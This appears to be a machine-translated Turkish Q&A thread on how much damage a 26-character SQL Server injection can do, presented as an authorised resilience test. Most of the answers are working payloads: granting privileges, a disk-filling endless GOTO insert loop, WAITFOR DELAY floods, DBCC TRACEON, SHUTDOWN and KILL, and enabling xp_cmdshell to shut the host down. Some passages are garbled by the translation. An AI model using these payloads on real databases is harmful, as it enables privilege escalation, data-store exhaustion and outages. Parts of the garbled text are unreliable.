SQL Server enjeksiyonu - 26 karakterde ne kadar hasar?

Bir SQL Server veritabanındaki enjeksiyon saldırılarına karşı dayanıklılığı test ediyorum.

Db'deki tüm tablo isimleri küçük harflidir ve harmanlama büyük / küçük harfe duyarlıdır, Latin1_General_CS_AS .

Gönderebileceğim dize büyük harfe zorlanıyor ve uzunluğu maksimum 26 karakter olabilir. Bu yüzden bir DROP TABLOSU gönderemiyorum, çünkü tablo adı büyük harf olur ve böylece ifade harmanlama nedeniyle başarısız olur.

Peki, 26 karakterde yapabileceğim maksimum hasar nedir?

DÜZENLE

Parametrelenmiş sorgular hakkında her şeyi biliyorum ve bunun gibi - hadi gönderelim ki sorguyu oluşturan ön ucu geliştiren kişi bu durumda param kullanmadı.

Ben de çılgınca bir şey yapmaya çalışmıyorum, bu aynı organizasyonda başkası tarafından yaptırılan bir sistem.

Kolay:

GRANT EXECUTE TO LowlyDBA

Veya sanırım bu durumda

grant execute to lowlydba 

Bununla ilgili çeşitlerinizi seçin.

Her durumda, bunu şimdiki sisteminize göre test edebilirsiniz, ancak zaman içinde veritabanındaki herhangi bir küçük değişiklik testinizi geçersiz kılabilir. Karakter dizgisi değişebilir, birisi yıkıcı potansiyeli olan küçük harf saklı bir prosedür yaratabilir. Asla% 100 güven içinde birisinin yapabileceği yıkıcı bir 26 karakter saldırısı olmadığı söylenemez.

Geliştiricinin temel endüstri standardı en iyi güvenlik uygulamalarını izlemesini sağlamanın bir yolunu bulmanızı öneriyorum , yalnızca güvenlik ihlali olursa, en azından kısmen sorumlu olduğunu düşündüğüm biri olarak kendi iyiliğiniz için.

Düzenle:

Kötü niyetlilık / eğlence için, her izleme bayrağını etkinleştirmeyi deneyebilirsiniz . Bunu gözlemlemek ilginç olurdu. Brent Ozar'ın yapacağı bir blog yazısı gibi görünüyor ...

DBCC TRACEON(xxxx, -1)

SHUTDOWNKomutu veya KILLumarım bu çalıştırmak için yeterli izinlere sahip değil hesap uygulama sorguları yürütme olsa Komutanlığı (50 yaşın üzerindeki rastgele bir numara seç) hem 26 karakterden daha belirgin az sürer.

Hangisi önce gelirse, zamanın sonuna kadar doldurduğunuz veya disk alanınız bitene kadar bir tablo oluşturabilirsiniz.

declare @S char(26);

set @S = 'create table t(c char(99))';
exec (@S);

set @S = 'insert t values('''')'
exec (@S);

set @S = 'insert t select c from t'
exec (@S);
exec (@S);
exec (@S);
exec (@S);
-- etc

Hasar tanımınıza bağlı olarak, şunu çalıştırabilirsiniz: WAITFOR DELAY '23: 59 'Gerçekten kötü olmak için, 32.768 müşteriden çalıştırmak için bir yük test aracı kullanabilirsiniz.

@ MikaelEriksson'nin yanıtına ve @ MartinSmith'in ilk yorumuma cevabına göre değişiklik:

declare @S char(26);

set @S = 'create table x(i int)';
exec (@S);

Başlangıçta WHILE ifadesi yapmaya çalıştım, ancak yapabileceğimin en iyisi 27 karakterdi:

set @S = 'while 1=1 insert t select 0'; -- fails at 27 characters
exec (@S);

Ancak Martin GOTO'ya dikkat çekti:

set @S = 'x:insert t select 0 GOTO x';
exec (@S);

GOTO ... Tüm kötülüklerin kökü ve 26 döngüde sonsuz döngülü insert deyiminin yaratıcısı.

Bununla birlikte ... daha fazla yer kullanacağı için int yerine CHAR (99) ile yapıştırmak avantajlı olabilir. Diğer seçenekler daha uzun isimler kullanır ve 26 karakter sınırını keser ... veya satır başına daha az depolama alanı kullanır.

Tam Test Kodu:

declare @S char(26);
set @S = 'drop table t;';
exec (@S);
GO

declare @S char(26);

set @S = 'create table t(c CHAR(99))';
exec (@S);

set @S = 'x:insert t select 0 GOTO x';
exec (@S);
GO

XP_CMDSHELL 'SHUTDOWN -PF'

Ne kadar zarar vereceğinize bağlı olarak bir güçlenme olduğunu düşünün. :-)

Bu, xp_cmdshell'in sunucuda etkinleştirilmesini gerektirir; SQL Server'ın son birkaç sürümü için geçerli olmayan bir şey. Ayrıca servis hesabının kapatma hakkına sahip olmasını gerektirir;

Xp_cmdshell öğesinin etkinleştirilmesi muhtemelen 26 karakter sınırınızın dışına çıkar. Birden fazla enjeksiyona izin verir misiniz?

SP_CONFIGURE 'SHOW ADV',1

RECONFIGURE

SP_CONFIGURE 'XP', 1

RECONFIGURE